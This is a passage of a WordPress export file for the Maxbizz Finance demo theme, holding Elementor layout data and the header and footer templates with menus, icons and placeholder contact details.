fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#FF8523","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":13,"sizes":[]},"icon_padding":{"unit":"em","size":0.6999999999999999555910790149937383830547332763671875,"sizes":[]},"icon_spacing":{"unit":"px","size":12,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_animation":"float","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-24]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_width";i:1;s:10:"logo_image";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:2;s:11:"header_size";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:1:{s:21:"typography_typography";i:2;}}}}s:13:"image-gallery";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"section_gallery";a:4:{s:10:"wp_gallery";i:1;s:15:"gallery_columns";i:1;s:14:"thumbnail_size";i:1;s:13:"open_lightbox";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;s:32:"description_typography_font_size";i:3;s:27:"title_typography_typography";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:6:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:1:{s:15:"hover_animation";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:1:{s:21:"background_background";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-5/</link>
		<pubDate>Fri, 24 Jul 2020 08:06:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=267</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/contacts/" role="button">
						CONTACT US
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/">
					<img src="https://maxbizz.s3.amazonaws.com/images/05_Black.svg" alt="Maxbizz Finance">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>				
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-2479"><a href="http://wpdemo.archiwp.com/maxbizz-finance/">Home</a></li>
<li id="menu-item-2102"><a href="#">Pages</a>
<ul>
	<li id="menu-item-2104"><a href="http://wpdemo.archiwp.com/maxbizz-finance/about-us/">About Us</a></li>
	<li id="menu-item-2126"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-services/">Our Services 1</a></li>
	<li id="menu-item-2121"><a href="http://wpdemo.archiwp.com/maxbizz-finance/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-2110"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-2111"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-team/">Our Team</a></li>
	<li id="menu-item-2112"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-2108"><a href="http://wpdemo.archiwp.com/maxbizz-finance/elements/">Elements</a></li>
	<li id="menu-item-2113"><a href="http://wpdemo.archiwp.com/maxbizz-finance/typography/">Typography</a></li>
	<li id="menu-item-2109"><a href="http://wpdemo.archiwp.com/maxbizz-finance/faqs/">FAQs</a></li>
	<li id="menu-item-2105"><a href="http://wpdemo.archiwp.com/maxbizz-finance/404-error/">404</a></li>
	<li id="menu-item-2106"><a href="http://wpdemo.archiwp.com/maxbizz-finance/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-2124"><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-2127"><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-2125"><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-2123"><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-2130"><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-2122"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-services/">Services</a>
<ul>
	<li id="menu-item-2120"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-2119"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-2118"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-2117"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-2116"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-2115"><a href="http://wpdemo.archiwp.com/maxbizz-finance/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-2114"><a href="http://wpdemo.archiwp.com/maxbizz-finance/blog/">Blog</a>
<ul>
	<li id="menu-item-2128"><a href="http://wpdemo.archiwp.com/maxbizz-finance/blog/">Blog List</a></li>
	<li id="menu-item-2129"><a href="http://wpdemo.archiwp.com/maxbizz-finance/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-2107"><a href="http://wpdemo.archiwp.com/maxbizz-finance/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-finance/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>267</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 08:06:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 08:06:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-5]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6883fb1","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#F5F5F5"},"elements":[{"id":"bae537d","elType":"column","settings":{"_column_size":33,"_inline_size":86.974999999999994315658113919198513031005859375,"content_position":"center"},"elements":[{"id":"e209fcf","elType":"widget","settings":{"editor":"<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.<\/p>","typography_typography":"custom","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","text_color":"#5F5F5F"},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3c6c353","elType":"column","settings":{"_column_size":66,"_inline_size":12.0069999999999996731503415503539144992828369140625,"align":"flex-end","_ot_column_min_width":{"unit":"px","size":165,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"856df84","elType":"widget","settings":{"text":"CONTACT US","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":13,"sizes":[]},"typography_font_weight":"500","background_color":"#52C5B6","button_background_hover_color":"#30344D","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"28","bottom":"12","left":"28","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-finance\/contacts\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"e4091a8","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"16","right":"0","bottom":"16","left":"0","isLinked":false}},"elements":[{"id":"95b9eb7","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"ac2109b","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05_Black.svg","id":2577},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"27b0423","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"1f76ab2","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"aec3252","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"26188f4","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"df85639","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#30344D","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"sticky_class":"is-fixed"},"elements":[{"id":"5ff3000","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"f7bff2e","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#52C5B6","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""},"menu_typography_typography":"custom","menu_typography_font_weight":"500"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"42df45d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"94c7570","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF","bg_btn":"#52C5B6"},"elements":[],"widgetType":"isearch"},{"id":"ea13c65","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:4:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:10:"text_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:6;s:16:"content_position";i:1;s:5:"align";i:3;s:20:"_ot_column_min_width";i:1;s:17:"_ot_content_align";i:3;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_button";a:2:{s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:10:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:29:"button_background_hover_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:17:"section_structure";a:1:{s:9:"structure";i:3;}s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:19:"header_custom_class";a:1:{s:12:"sticky_class";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:4:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:2:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_footer_builders/footer-1/</link>
		<pubDate>Fri, 24 Jul 2020 09:02:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_footer_builders&#038;p=300</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>about us</h6>		
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Linkedin-in
											</a>
			<h6>Head office</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>our location</h6>		
										<img width="328" height="199" src="https://maxbizz.s3.amazonaws.com/images/map-footer-home5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/map-footer-home5.png 328w, https://maxbizz.s3.amazonaws.com/images/map-footer-home5-300x182.png 300w" sizes="(max-width: 328px) 100vw, 328px" />											
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					London
				</h6>
								<p>+5-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Tokyo
				</h6>
								<p>+3-800-456-478-23</p>
		<p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>300</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 09:02:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 09:02:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
